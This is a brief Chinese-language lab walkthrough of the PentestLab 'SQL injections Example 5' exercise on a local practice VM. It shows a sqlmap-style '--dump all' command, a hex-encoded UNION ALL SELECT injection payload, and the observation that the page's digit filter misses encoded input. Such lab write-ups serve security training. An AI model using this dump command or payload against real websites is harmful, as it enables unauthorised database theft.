我们打开靶机,选择“sql  injections”

选择“Example5”


PentestLab-web安全SQL注入-EXP5_sql


观察页面


PentestLab-web安全SQL注入-EXP5_sql_02



使用工具测试


参数为


-u "http://192.168.29.148/sqli/example5.php?id=2" --dump all


payload为


id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4a4859624e4166537a476246556b4757574375516e647a584a4341486b5a5562614c4d506f4a6e54,0x7162787671),NULL,NULL-- -


明显是经过编码之后的注入

结果


PentestLab-web安全SQL注入-EXP5_sql注入_03


存在sql注入漏洞


我们打开靶机,

分析源代码


PentestLab-web安全SQL注入-EXP5_sql注入_04


过滤了0-9的数字,但是有些编码并没有过滤掉。